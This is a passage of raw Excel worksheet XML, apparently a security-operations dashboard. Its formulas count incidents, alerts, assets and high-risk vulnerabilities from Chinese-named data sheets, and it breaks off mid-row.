      <c r="O2" s="130"/>
      <c r="P2" s="130"/>
      <c r="Q2" s="130"/>
      <c r="R2" s="130"/>
      <c r="S2" s="130"/>
      <c r="T2" s="130"/>
      <c r="U2" s="130"/>
      <c r="V2" s="130"/>
      <c r="W2" s="130"/>
      <c r="X2" s="130"/>
    </row>
    <row r="3" spans="1:30">
      <c r="A3" s="130"/>
      <c r="B3" s="130"/>
      <c r="C3" s="130"/>
      <c r="D3" s="130"/>
      <c r="E3" s="130"/>
      <c r="F3" s="130"/>
      <c r="G3" s="130"/>
      <c r="H3" s="130"/>
      <c r="I3" s="130"/>
      <c r="J3" s="130"/>
      <c r="K3" s="130"/>
      <c r="L3" s="130"/>
      <c r="M3" s="130"/>
      <c r="N3" s="130"/>
      <c r="O3" s="130"/>
      <c r="P3" s="130"/>
      <c r="Q3" s="130"/>
      <c r="R3" s="130"/>
      <c r="S3" s="130"/>
      <c r="T3" s="130"/>
      <c r="U3" s="130"/>
      <c r="V3" s="130"/>
      <c r="W3" s="130"/>
      <c r="X3" s="130"/>
    </row>
    <row r="4" ht="18.6" spans="1:30">
      <c r="A4" s="130"/>
      <c r="B4" s="130"/>
      <c r="C4" s="130"/>
      <c r="D4" s="130"/>
      <c r="E4" s="130"/>
      <c r="F4" s="130"/>
      <c r="G4" s="130"/>
      <c r="H4" s="130"/>
      <c r="I4" s="130"/>
      <c r="J4" s="130"/>
      <c r="K4" s="130"/>
      <c r="L4" s="130"/>
      <c r="M4" s="130"/>
      <c r="N4" s="130"/>
      <c r="O4" s="130"/>
      <c r="P4" s="130"/>
      <c r="Q4" s="130"/>
      <c r="R4" s="130"/>
      <c r="S4" s="130"/>
      <c r="T4" s="130"/>
      <c r="U4" s="130"/>
      <c r="V4" s="130"/>
      <c r="W4" s="130"/>
      <c r="X4" s="130"/>
      <c r="AD4" s="198"/>
    </row>
    <row r="5" spans="1:30">
      <c r="A5" s="130"/>
      <c r="B5" s="130"/>
      <c r="C5" s="130"/>
      <c r="D5" s="130"/>
      <c r="E5" s="130"/>
      <c r="F5" s="130"/>
      <c r="G5" s="130"/>
      <c r="H5" s="130"/>
      <c r="I5" s="130"/>
      <c r="J5" s="130"/>
      <c r="K5" s="130"/>
      <c r="L5" s="130"/>
      <c r="M5" s="130"/>
      <c r="N5" s="130"/>
      <c r="O5" s="130"/>
      <c r="P5" s="130"/>
      <c r="Q5" s="130"/>
      <c r="R5" s="130"/>
      <c r="S5" s="130"/>
      <c r="T5" s="130"/>
      <c r="U5" s="130"/>
      <c r="V5" s="130"/>
      <c r="W5" s="130"/>
      <c r="X5" s="130"/>
    </row>
    <row r="6" spans="1:30">
      <c r="A6" s="130"/>
      <c r="B6" s="130"/>
      <c r="C6" s="130"/>
      <c r="D6" s="130"/>
      <c r="E6" s="130"/>
      <c r="F6" s="130"/>
      <c r="G6" s="130"/>
      <c r="H6" s="130"/>
      <c r="I6" s="130"/>
      <c r="J6" s="130"/>
      <c r="K6" s="130"/>
      <c r="L6" s="130"/>
      <c r="M6" s="130"/>
      <c r="N6" s="130"/>
      <c r="O6" s="130"/>
      <c r="P6" s="130"/>
      <c r="Q6" s="130"/>
      <c r="R6" s="130"/>
      <c r="S6" s="130"/>
      <c r="T6" s="130"/>
      <c r="U6" s="130"/>
      <c r="V6" s="130"/>
      <c r="W6" s="130"/>
      <c r="X6" s="130"/>
    </row>
    <row r="7" spans="1:30">
      <c r="A7" s="130"/>
      <c r="B7" s="130"/>
      <c r="C7" s="130"/>
      <c r="D7" s="130"/>
      <c r="E7" s="130"/>
      <c r="F7" s="130"/>
      <c r="G7" s="130"/>
      <c r="H7" s="130"/>
      <c r="I7" s="130"/>
      <c r="J7" s="130"/>
      <c r="K7" s="130"/>
      <c r="L7" s="130"/>
      <c r="M7" s="130"/>
      <c r="N7" s="130"/>
      <c r="O7" s="130"/>
      <c r="P7" s="130"/>
      <c r="Q7" s="130"/>
      <c r="R7" s="130"/>
      <c r="S7" s="130"/>
      <c r="T7" s="130"/>
      <c r="U7" s="130"/>
      <c r="V7" s="130"/>
      <c r="W7" s="130"/>
      <c r="X7" s="130"/>
    </row>
    <row r="8" spans="1:30">
      <c r="A8" s="130"/>
      <c r="B8" s="130"/>
      <c r="C8" s="130"/>
      <c r="D8" s="130"/>
      <c r="E8" s="130"/>
      <c r="F8" s="130"/>
      <c r="G8" s="130"/>
      <c r="H8" s="130"/>
      <c r="I8" s="130"/>
      <c r="J8" s="130"/>
      <c r="K8" s="130"/>
      <c r="L8" s="130"/>
      <c r="M8" s="130"/>
      <c r="N8" s="130"/>
      <c r="O8" s="130"/>
      <c r="P8" s="130"/>
      <c r="Q8" s="130"/>
      <c r="R8" s="130"/>
      <c r="S8" s="130"/>
      <c r="T8" s="130"/>
      <c r="U8" s="130"/>
      <c r="V8" s="130"/>
      <c r="W8" s="130"/>
      <c r="X8" s="130"/>
    </row>
    <row r="9" spans="1:30">
      <c r="A9" s="130"/>
      <c r="B9" s="130"/>
      <c r="C9" s="130"/>
      <c r="D9" s="130"/>
      <c r="E9" s="130"/>
      <c r="F9" s="130"/>
      <c r="G9" s="130"/>
      <c r="H9" s="130"/>
      <c r="I9" s="130"/>
      <c r="J9" s="130"/>
      <c r="K9" s="130"/>
      <c r="L9" s="130"/>
      <c r="M9" s="130"/>
      <c r="N9" s="130"/>
      <c r="O9" s="130"/>
      <c r="P9" s="130"/>
      <c r="Q9" s="130"/>
      <c r="R9" s="130"/>
      <c r="S9" s="130"/>
      <c r="T9" s="130"/>
      <c r="U9" s="130"/>
      <c r="V9" s="130"/>
      <c r="W9" s="130"/>
      <c r="X9" s="130"/>
    </row>
    <row r="10" spans="1:30">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row>
    <row r="11" spans="1:30">
      <c r="A11" s="130"/>
      <c r="B11" s="130"/>
      <c r="C11" s="130"/>
      <c r="D11" s="130"/>
      <c r="E11" s="130"/>
      <c r="F11" s="130"/>
      <c r="G11" s="130"/>
      <c r="H11" s="130"/>
      <c r="I11" s="130"/>
      <c r="J11" s="130"/>
      <c r="K11" s="130"/>
      <c r="L11" s="130"/>
      <c r="M11" s="130"/>
      <c r="N11" s="130"/>
      <c r="O11" s="130"/>
      <c r="P11" s="130"/>
      <c r="Q11" s="130"/>
      <c r="R11" s="130"/>
      <c r="S11" s="130"/>
      <c r="T11" s="130"/>
      <c r="U11" s="130"/>
      <c r="V11" s="130"/>
      <c r="W11" s="130"/>
      <c r="X11" s="130"/>
    </row>
    <row r="12" spans="1:30">
      <c r="A12" s="130"/>
      <c r="B12" s="130"/>
      <c r="C12" s="130"/>
      <c r="D12" s="130"/>
      <c r="E12" s="130"/>
      <c r="F12" s="130"/>
      <c r="G12" s="130"/>
      <c r="H12" s="130"/>
      <c r="I12" s="130"/>
      <c r="J12" s="130"/>
      <c r="K12" s="130"/>
      <c r="L12" s="130"/>
      <c r="M12" s="130"/>
      <c r="N12" s="130"/>
      <c r="O12" s="130"/>
      <c r="P12" s="130"/>
      <c r="Q12" s="130"/>
      <c r="R12" s="130"/>
      <c r="S12" s="130"/>
      <c r="T12" s="130"/>
      <c r="U12" s="130"/>
      <c r="V12" s="130"/>
      <c r="W12" s="130"/>
      <c r="X12" s="130"/>
    </row>
    <row r="13" spans="1:30">
      <c r="A13" s="130"/>
      <c r="B13" s="130"/>
      <c r="C13" s="130"/>
      <c r="D13" s="130"/>
      <c r="E13" s="130"/>
      <c r="F13" s="130"/>
      <c r="G13" s="130"/>
      <c r="H13" s="130"/>
      <c r="I13" s="130"/>
      <c r="J13" s="130"/>
      <c r="K13" s="130"/>
      <c r="L13" s="130"/>
      <c r="M13" s="130"/>
      <c r="N13" s="130"/>
      <c r="O13" s="130"/>
      <c r="P13" s="130"/>
      <c r="Q13" s="130"/>
      <c r="R13" s="130"/>
      <c r="S13" s="130"/>
      <c r="T13" s="130"/>
      <c r="U13" s="130"/>
      <c r="V13" s="130"/>
      <c r="W13" s="130"/>
      <c r="X13" s="130"/>
    </row>
    <row r="14" spans="1:30">
      <c r="A14" s="130"/>
      <c r="B14" s="130"/>
      <c r="C14" s="130"/>
      <c r="D14" s="130"/>
      <c r="E14" s="130"/>
      <c r="F14" s="130"/>
      <c r="G14" s="130"/>
      <c r="H14" s="130"/>
      <c r="I14" s="130"/>
      <c r="J14" s="130"/>
      <c r="K14" s="130"/>
      <c r="L14" s="130"/>
      <c r="M14" s="130"/>
      <c r="N14" s="130"/>
      <c r="O14" s="130"/>
      <c r="P14" s="130"/>
      <c r="Q14" s="130"/>
      <c r="R14" s="130"/>
      <c r="S14" s="130"/>
      <c r="T14" s="130"/>
      <c r="U14" s="130"/>
      <c r="V14" s="130"/>
      <c r="W14" s="130"/>
      <c r="X14" s="130"/>
    </row>
    <row r="15" spans="1:30">
      <c r="A15" s="130"/>
      <c r="B15" s="130"/>
      <c r="C15" s="130"/>
      <c r="D15" s="130"/>
      <c r="E15" s="130"/>
      <c r="F15" s="130"/>
      <c r="G15" s="130"/>
      <c r="H15" s="130"/>
      <c r="I15" s="130"/>
      <c r="J15" s="130"/>
      <c r="K15" s="130"/>
      <c r="L15" s="130"/>
      <c r="M15" s="130"/>
      <c r="N15" s="130"/>
      <c r="O15" s="130"/>
      <c r="P15" s="130"/>
      <c r="Q15" s="130"/>
      <c r="R15" s="130"/>
      <c r="S15" s="130"/>
      <c r="T15" s="130"/>
      <c r="U15" s="130"/>
      <c r="V15" s="130"/>
      <c r="W15" s="130"/>
      <c r="X15" s="130"/>
    </row>
    <row r="16" spans="1:30">
      <c r="A16" s="130"/>
      <c r="B16" s="130"/>
      <c r="C16" s="130"/>
      <c r="D16" s="130"/>
      <c r="E16" s="130"/>
      <c r="F16" s="130"/>
      <c r="G16" s="130"/>
      <c r="H16" s="130"/>
      <c r="I16" s="130"/>
      <c r="J16" s="130"/>
      <c r="K16" s="130"/>
      <c r="L16" s="130"/>
      <c r="M16" s="130"/>
      <c r="N16" s="130"/>
      <c r="O16" s="130"/>
      <c r="P16" s="130"/>
      <c r="Q16" s="130"/>
      <c r="R16" s="130"/>
      <c r="S16" s="130"/>
      <c r="T16" s="130"/>
      <c r="U16" s="130"/>
      <c r="V16" s="130"/>
      <c r="W16" s="130"/>
      <c r="X16" s="130"/>
    </row>
    <row r="17" spans="1:24">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row>
    <row r="18" spans="1:24">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row>
    <row r="19" spans="1:24">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row>
    <row r="20" spans="1:24">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row>
    <row r="21" spans="1:24">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row>
    <row r="22" spans="1:24">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row>
    <row r="23" spans="1:24">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row>
    <row r="24" spans="1:24">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row>
    <row r="25" spans="1:24">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row>
    <row r="26" spans="1:24">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row>
    <row r="27" spans="1:24">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row>
    <row r="28" spans="1:24">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row>
    <row r="29" spans="1:24">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row>
    <row r="30" spans="1:24">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row>
    <row r="31" spans="1:24">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row>
    <row r="32" spans="1:24">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row>
    <row r="33" spans="1:24">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row>
    <row r="34" spans="1:24">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row>
    <row r="35" spans="1:24">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row>
    <row r="36" spans="1:24">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row>
    <row r="37" spans="1:24">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row>
    <row r="38" spans="1:24">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row>
    <row r="39" spans="1:24">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row>
    <row r="40" spans="1:24">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row>
    <row r="41" spans="1:24">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row>
    <row r="42" spans="1:24">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row>
    <row r="43" spans="1:24">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row>
  </sheetData>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124"/>
  <sheetViews>
    <sheetView showGridLines="0" tabSelected="1" zoomScale="115" zoomScaleNormal="115" topLeftCell="A98" workbookViewId="0">
      <selection activeCell="C121" sqref="C121"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4"/>
  <cols>
    <col min="2" max="2" width="18.2592592592593" customWidth="1"/>
    <col min="3" max="3" width="24.8333333333333" customWidth="1"/>
    <col min="4" max="4" width="20.6759259259259" customWidth="1"/>
    <col min="5" max="5" width="19.2314814814815" customWidth="1"/>
    <col min="6" max="6" width="28.9907407407407" customWidth="1"/>
    <col min="7" max="7" width="14.1018518518519" customWidth="1"/>
    <col min="8" max="8" width="19.8611111111111" customWidth="1"/>
    <col min="9" max="9" width="21.4722222222222" customWidth="1"/>
    <col min="10" max="10" width="22.2685185185185" customWidth="1"/>
    <col min="11" max="11" width="20.9907407407407" customWidth="1"/>
    <col min="12" max="12" width="21.9537037037037" customWidth="1"/>
    <col min="13" max="13" width="21.4722222222222" customWidth="1"/>
    <col min="14" max="14" width="18.5833333333333" customWidth="1"/>
    <col min="15" max="16" width="9.61111111111111"/>
    <col min="17" max="19" width="12.9259259259259"/>
    <col min="20" max="22" width="9.61111111111111"/>
  </cols>
  <sheetData>
    <row r="1" ht="37" customHeight="1" spans="2:13">
      <c r="B1" s="111" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="112"/>
      <c r="D1" s="112"/>
      <c r="E1" s="112"/>
      <c r="F1" s="113"/>
      <c r="H1" s="114" t="s">
        <v>1</v>
      </c>
      <c r="I1" s="115">
        <f ca="1">TODAY()</f>
        <v>46113</v>
      </c>
      <c r="K1" s="93" t="s">
        <v>2</v>
      </c>
      <c r="L1" s="116">
        <v>45870</v>
      </c>
      <c r="M1" s="115">
        <v>46098</v>
      </c>
    </row>
    <row r="3" spans="2:13">
      <c r="B3" s="93" t="s">
        <v>3</v>
      </c>
      <c r="C3" s="93" t="s">
        <v>4</v>
      </c>
      <c r="D3" s="117">
        <v>10</v>
      </c>
    </row>
    <row r="4" spans="2:13">
      <c r="B4" s="118" t="s">
        <v>5</v>
      </c>
      <c r="C4" s="93" t="s">
        <v>6</v>
      </c>
      <c r="D4" s="117">
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="2:13">
      <c r="B5" s="119"/>
      <c r="C5" s="93" t="s">
        <v>7</v>
      </c>
      <c r="D5" s="117">
        <v>104</v>
      </c>
    </row>
    <row r="6" spans="2:13">
      <c r="B6" s="119"/>
      <c r="C6" s="120" t="s">
        <v>8</v>
      </c>
      <c r="D6" s="117">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="2:13">
      <c r="B7" s="121"/>
      <c r="C7" s="93" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="117">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="2:13">
      <c r="B8" s="122" t="s">
        <v>10</v>
      </c>
      <c r="C8" s="122" t="s">
        <v>11</v>
      </c>
      <c r="D8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="E8" s="122" t="s">
        <v>13</v>
      </c>
      <c r="F8" s="117" t="s">
        <v>14</v>
      </c>
      <c r="G8" s="122" t="s">
        <v>15</v>
      </c>
      <c r="H8" s="117" t="s">
        <v>16</v>
      </c>
      <c r="I8" s="122" t="s">
        <v>17</v>
      </c>
      <c r="J8" s="117" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="9" spans="2:13">
      <c r="B9" s="93"/>
      <c r="C9" s="93" t="s">
        <v>19</v>
      </c>
      <c r="D9" s="117">
        <v>1</v>
      </c>
      <c r="E9" s="93"/>
      <c r="F9" s="93" t="s">
        <v>20</v>
      </c>
      <c r="G9" s="123">
        <f>IF(M1-L1&gt;0,INT((M1-L1)/7),"")</f>
        <v>32</v>
      </c>
      <c r="J9" s="124"/>
    </row>
    <row r="10" spans="2:13">
      <c r="B10" s="119" t="s">
        <v>21</v>
      </c>
      <c r="C10" s="125" t="s">
        <v>22</v>
      </c>
      <c r="D10" s="126">
        <v>1</v>
      </c>
      <c r="F10" s="125" t="s">
        <v>23</v>
      </c>
      <c r="G10" s="127">
        <f>IF(M1-L1&gt;0,INT((M1-L1)/30),"")</f>
        <v>7</v>
      </c>
      <c r="J10" s="124"/>
    </row>
    <row r="11" spans="2:13">
      <c r="B11" s="119"/>
      <c r="C11" s="93" t="s">
        <v>24</v>
      </c>
      <c r="D11" s="123">
        <f>IF(M1-L1&gt;0,INT((M1-L1)/91),"")</f>
        <v>2</v>
      </c>
      <c r="F11" s="93" t="s">
        <v>25</v>
      </c>
      <c r="G11" s="123">
        <f>IF(M1-L1&gt;0,INT((M1-L1)/91),"")</f>
        <v>2</v>
      </c>
      <c r="J11" s="124"/>
    </row>
    <row r="12" spans="2:13">
      <c r="B12" s="119"/>
      <c r="C12" s="93" t="s">
        <v>26</v>
      </c>
      <c r="D12" s="123">
        <f>IF(M1-L1&gt;0,INT((M1-L1)/91),"")</f>
        <v>2</v>
      </c>
      <c r="G12" s="128"/>
      <c r="J12" s="124"/>
    </row>
    <row r="13" spans="2:13">
      <c r="B13" s="119"/>
      <c r="C13" s="93" t="s">
        <v>27</v>
      </c>
      <c r="D13" s="117">
        <v>1</v>
      </c>
      <c r="F13" s="129" t="s">
        <v>28</v>
      </c>
      <c r="G13" s="123">
        <f>COUNTIFS(F103:F109,"&lt;&gt;")</f>
        <v>4</v>
      </c>
      <c r="J13" s="124"/>
    </row>
    <row r="14" spans="2:13">
      <c r="B14" s="119"/>
      <c r="C14" s="93" t="s">
        <v>29</v>
      </c>
      <c r="D14" s="123">
        <f>IF(M1-L1&gt;0,INT((M1-L1)/30),"")</f>
        <v>7</v>
      </c>
      <c r="F14" s="130"/>
      <c r="G14" s="131"/>
      <c r="J14" s="124"/>
    </row>
    <row r="15" spans="2:13">
      <c r="B15" s="119"/>
      <c r="C15" s="93" t="s">
        <v>30</v>
      </c>
      <c r="D15" s="117">
        <v>0</v>
      </c>
      <c r="F15" s="130"/>
      <c r="G15" s="131"/>
      <c r="J15" s="124"/>
    </row>
    <row r="16" spans="2:13">
      <c r="B16" s="119"/>
      <c r="C16" s="93" t="s">
        <v>31</v>
      </c>
      <c r="D16" s="117">
        <v>1</v>
      </c>
      <c r="J16" s="124"/>
    </row>
    <row r="17" spans="2:12">
      <c r="B17" s="119"/>
      <c r="F17" s="93" t="s">
        <v>32</v>
      </c>
      <c r="G17" s="123">
        <f>COUNTIFS(事件表!A:A,"最新威胁")</f>
        <v>109</v>
      </c>
      <c r="J17" s="124"/>
    </row>
    <row r="18" spans="2:12">
      <c r="B18" s="121"/>
      <c r="C18" s="132"/>
      <c r="D18" s="132"/>
      <c r="E18" s="132"/>
      <c r="F18" s="93" t="s">
        <v>33</v>
      </c>
      <c r="G18" s="117">
        <v>0</v>
      </c>
      <c r="H18" s="132"/>
      <c r="I18" s="132"/>
      <c r="J18" s="133"/>
    </row>
    <row r="19" spans="2:12">
      <c r="B19" s="134"/>
    </row>
    <row r="20" spans="2:12">
      <c r="B20" s="114" t="s">
        <v>34</v>
      </c>
      <c r="C20" s="93" t="s">
        <v>35</v>
      </c>
      <c r="D20" s="93" t="s">
        <v>36</v>
      </c>
      <c r="E20" s="93" t="s">
        <v>37</v>
      </c>
      <c r="F20" s="122" t="s">
        <v>38</v>
      </c>
      <c r="G20" s="122" t="s">
        <v>39</v>
      </c>
      <c r="H20" s="93" t="s">
        <v>40</v>
      </c>
      <c r="I20" s="93" t="s">
        <v>41</v>
      </c>
      <c r="J20" s="135"/>
      <c r="K20" s="135"/>
      <c r="L20" s="136"/>
    </row>
    <row r="21" spans="2:12">
      <c r="B21" s="114"/>
      <c r="C21" s="122"/>
      <c r="D21" s="122" t="s">
        <v>42</v>
      </c>
      <c r="E21" s="122">
        <v>0</v>
      </c>
      <c r="F21" s="137">
        <v>1</v>
      </c>
      <c r="G21" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>26</v>
      </c>
      <c r="H21" s="138">
        <v>1</v>
      </c>
      <c r="I21" s="139">
        <f>AVERAGEIFS(事件表!BB:BB,事件表!BB:BB,"&lt;&gt;",事件表!A:A,"*事件*")</f>
        <v>13.9841666666667</v>
      </c>
      <c r="L21" s="124"/>
    </row>
    <row r="22" spans="2:12">
      <c r="B22" s="118" t="s">
        <v>5</v>
      </c>
      <c r="C22" s="93" t="s">
        <v>4</v>
      </c>
      <c r="D22" s="140">
        <v>10</v>
      </c>
      <c r="E22" s="93" t="s">
        <v>43</v>
      </c>
      <c r="F22" s="93" t="s">
        <v>44</v>
      </c>
      <c r="G22" s="141">
        <v>4356578</v>
      </c>
      <c r="H22" s="93" t="s">
        <v>45</v>
      </c>
      <c r="I22" s="93" t="s">
        <v>46</v>
      </c>
      <c r="J22" s="117">
        <v>118</v>
      </c>
      <c r="K22" s="142" t="s">
        <v>47</v>
      </c>
      <c r="L22" s="143">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="2:12">
      <c r="B23" s="119"/>
      <c r="C23" s="93" t="s">
        <v>6</v>
      </c>
      <c r="D23" s="140">
        <v>5</v>
      </c>
      <c r="E23" s="118" t="s">
        <v>48</v>
      </c>
      <c r="F23" s="93" t="s">
        <v>49</v>
      </c>
      <c r="G23" s="144">
        <f>1-G24/G22</f>
        <v>0.978804694877493</v>
      </c>
      <c r="H23" s="114" t="s">
        <v>50</v>
      </c>
      <c r="I23" s="93" t="s">
        <v>51</v>
      </c>
      <c r="J23" s="117">
        <v>16199</v>
      </c>
      <c r="K23" s="142" t="s">
        <v>52</v>
      </c>
      <c r="L23" s="143">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="2:12">
      <c r="B24" s="119"/>
      <c r="C24" s="93" t="s">
        <v>7</v>
      </c>
      <c r="D24" s="140">
        <v>104</v>
      </c>
      <c r="E24" s="119"/>
      <c r="F24" s="93" t="s">
        <v>53</v>
      </c>
      <c r="G24" s="140">
        <v>92339</v>
      </c>
      <c r="H24" s="114"/>
      <c r="I24" s="93" t="s">
        <v>54</v>
      </c>
      <c r="J24" s="117">
        <v>10248</v>
      </c>
      <c r="K24" s="142" t="s">
        <v>55</v>
      </c>
      <c r="L24" s="143">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="2:12">
      <c r="B25" s="119"/>
      <c r="C25" s="120" t="s">
        <v>8</v>
      </c>
      <c r="D25" s="140">
        <v>1</v>
      </c>
      <c r="E25" s="119"/>
      <c r="F25" s="93" t="s">
        <v>56</v>
      </c>
      <c r="G25" s="144">
        <f>1-G26/G24</f>
        <v>0.853918712569987</v>
      </c>
      <c r="H25" s="114"/>
      <c r="I25" s="93" t="s">
        <v>57</v>
      </c>
      <c r="J25" s="143">
        <v>1</v>
      </c>
      <c r="K25" s="142" t="s">
        <v>58</v>
      </c>
      <c r="L25" s="144">
        <f>COUNTIFS(告警表!E:E,"*自动*")/(COUNTA(告警表!E:E)-1)</f>
        <v>0.392030156165859</v>
      </c>
    </row>
    <row r="26" spans="2:12">
      <c r="B26" s="121"/>
      <c r="C26" s="93" t="s">
        <v>9</v>
      </c>
      <c r="D26" s="140">
        <v>0</v>
      </c>
      <c r="E26" s="119"/>
      <c r="F26" s="93" t="s">
        <v>59</v>
      </c>
      <c r="G26" s="140">
        <v>13489</v>
      </c>
      <c r="H26" s="114"/>
      <c r="I26" s="93" t="s">
        <v>60</v>
      </c>
      <c r="J26" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!BA:BA,"&lt;&gt;",事件表!A:A,"*事件*")</f>
        <v>8.44961538461538</v>
      </c>
      <c r="K26" s="136" t="s">
        <v>61</v>
      </c>
      <c r="L26" s="146">
        <f>(COUNTIFS(告警表!E:E,"已驳回")+COUNTIFS(告警表!E:E,"已加白")+COUNTIFS(告警表!E:E,"已完成"))/(COUNTA(告警表!E:E)-1)</f>
        <v>0.600969305331179</v>
      </c>
    </row>
    <row r="27" spans="2:12">
      <c r="B27" s="147"/>
      <c r="E27" s="119"/>
      <c r="F27" s="148" t="s">
        <v>62</v>
      </c>
      <c r="G27" s="149">
        <v>185</v>
      </c>
      <c r="H27" s="114" t="s">
        <v>63</v>
      </c>
      <c r="I27" s="93" t="s">
        <v>46</v>
      </c>
      <c r="J27" s="150">
        <f>G27-J22</f>
        <v>67</v>
      </c>
      <c r="K27" s="151"/>
      <c r="L27" s="136"/>
    </row>
    <row r="28" spans="2:12">
      <c r="B28" s="118" t="s">
        <v>64</v>
      </c>
      <c r="C28" s="93" t="s">
        <v>65</v>
      </c>
      <c r="D28" s="152" cm="1">
        <f t="array" ref="D28">COUNTA(_xlfn.UNIQUE(资产表!$B$2:$B$20000))</f>
        <v>155</v>
      </c>
      <c r="E28" s="151"/>
      <c r="F28" s="135"/>
      <c r="G28" s="136"/>
      <c r="H28" s="153"/>
      <c r="I28" s="93" t="s">
        <v>66</v>
      </c>
      <c r="J28" s="150">
        <f>G24-J23-16199</f>
        <v>59941</v>
      </c>
      <c r="K28" s="154"/>
      <c r="L28" s="124"/>
    </row>
    <row r="29" spans="2:12">
      <c r="B29" s="119"/>
      <c r="C29" s="93" t="s">
        <v>67</v>
      </c>
      <c r="D29" s="152">
        <f>COUNTIFS(资产表!F:F,"服务器")</f>
        <v>160</v>
      </c>
      <c r="E29" s="154"/>
      <c r="F29" s="155"/>
      <c r="G29" s="124"/>
      <c r="H29" s="153"/>
      <c r="I29" s="93" t="s">
        <v>68</v>
      </c>
      <c r="J29" s="150">
        <f>G26-J24</f>
        <v>3241</v>
      </c>
      <c r="K29" s="154"/>
      <c r="L29" s="124"/>
    </row>
    <row r="30" spans="2:12">
      <c r="B30" s="121"/>
      <c r="C30" s="93" t="s">
        <v>69</v>
      </c>
      <c r="D30" s="152">
        <f>COUNTIFS(资产表!F:F,"终端")</f>
        <v>950</v>
      </c>
      <c r="E30" s="154"/>
      <c r="F30" s="155"/>
      <c r="G30" s="124"/>
      <c r="H30" s="153"/>
      <c r="I30" s="93" t="s">
        <v>70</v>
      </c>
      <c r="J30" s="156">
        <v>1</v>
      </c>
      <c r="K30" s="154"/>
      <c r="L30" s="124"/>
    </row>
    <row r="31" spans="2:12">
      <c r="B31" s="157"/>
      <c r="C31" s="132"/>
      <c r="D31" s="158"/>
      <c r="E31" s="159"/>
      <c r="F31" s="132"/>
      <c r="G31" s="133"/>
      <c r="H31" s="153"/>
      <c r="I31" s="93" t="s">
        <v>60</v>
      </c>
      <c r="J31" s="140">
        <v>312.33</v>
      </c>
      <c r="K31" s="159"/>
      <c r="L31" s="133"/>
    </row>
    <row r="32" spans="2:12">
      <c r="B32" s="160"/>
    </row>
    <row r="33" spans="2:7">
      <c r="B33" s="114" t="s">
        <v>71</v>
      </c>
      <c r="C33" s="93" t="s">
        <v>72</v>
      </c>
      <c r="D33" s="93" t="s">
        <v>73</v>
      </c>
      <c r="E33" s="93" t="s">
        <v>74</v>
      </c>
      <c r="F33" s="93" t="s">
        <v>75</v>
      </c>
      <c r="G33" s="136"/>
    </row>
    <row r="34" spans="2:7">
      <c r="B34" s="114"/>
      <c r="C34" s="161">
        <f>D38/D43</f>
        <v>0.0285714285714286</v>
      </c>
      <c r="D34" s="137">
        <v>1</v>
      </c>
      <c r="E34" s="139">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!BA:BA,"&lt;&gt;",事件表!A:A,"*事件*")</f>
        <v>8.44961538461538</v>
      </c>
      <c r="F34" s="138">
        <v>1</v>
      </c>
      <c r="G34" s="124"/>
    </row>
    <row r="35" spans="2:7">
      <c r="B35" s="118" t="s">
        <v>76</v>
      </c>
      <c r="C35" s="93" t="s">
        <v>77</v>
      </c>
      <c r="D35" s="117">
        <v>24401</v>
      </c>
      <c r="E35" s="122" t="s">
        <v>78</v>
      </c>
      <c r="F35" s="93" t="s">
        <v>79</v>
      </c>
      <c r="G35" s="117">
        <f>G22</f>
        <v>4356578</v>
      </c>
    </row>
    <row r="36" spans="2:7">
      <c r="B36" s="119"/>
      <c r="C36" s="93" t="s">
        <v>80</v>
      </c>
      <c r="D36" s="117">
        <v>185</v>
      </c>
      <c r="E36" s="122"/>
      <c r="F36" s="93" t="s">
        <v>81</v>
      </c>
      <c r="G36" s="117">
        <f>G24</f>
        <v>92339</v>
      </c>
    </row>
    <row r="37" spans="2:7">
      <c r="B37" s="119"/>
      <c r="C37" s="93" t="s">
        <v>82</v>
      </c>
      <c r="D37" s="117">
        <v>2</v>
      </c>
      <c r="E37" s="122"/>
      <c r="F37" s="93" t="s">
        <v>83</v>
      </c>
      <c r="G37" s="117">
        <f>G26</f>
        <v>13489</v>
      </c>
    </row>
    <row r="38" spans="2:7">
      <c r="B38" s="121"/>
      <c r="C38" s="93" t="s">
        <v>84</v>
      </c>
      <c r="D38" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!F:F,"是",资产漏洞表!P:P,"已防护")</f>
        <v>1</v>
      </c>
      <c r="E38" s="122"/>
      <c r="F38" s="93" t="s">
        <v>85</v>
      </c>
      <c r="G38" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>26</v>
      </c>
    </row>
    <row r="39" spans="2:7">
      <c r="B39" s="118" t="s">
        <v>86</v>
      </c>
      <c r="C39" s="93" t="s">
        <v>87</v>
      </c>
      <c r="D39" s="117">
        <v>1</v>
      </c>
      <c r="E39" s="122"/>
      <c r="F39" s="93" t="s">
        <v>88</v>
      </c>
      <c r="G39" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!BA:BA,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>13.9841666666667</v>
      </c>
    </row>
    <row r="40" spans="2:7">
      <c r="B40" s="119"/>
      <c r="C40" s="93" t="s">
        <v>89</v>
      </c>
      <c r="D40" s="117">
        <v>2</v>
      </c>
      <c r="E40" s="122" t="s">
        <v>90</v>
      </c>
      <c r="F40" s="93" t="s">
        <v>91</v>
      </c>
      <c r="G40" s="117">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="2:7">
      <c r="B41" s="119"/>
      <c r="C41" s="93" t="s">
        <v>92</v>
      </c>
      <c r="D41" s="122">
        <f>COUNTIFS(资产表!F:F,"服务器")</f>
        <v>160</v>
      </c>
      <c r="E41" s="122"/>
      <c r="F41" s="93" t="s">
        <v>93</v>
      </c>
      <c r="G41" s="122">
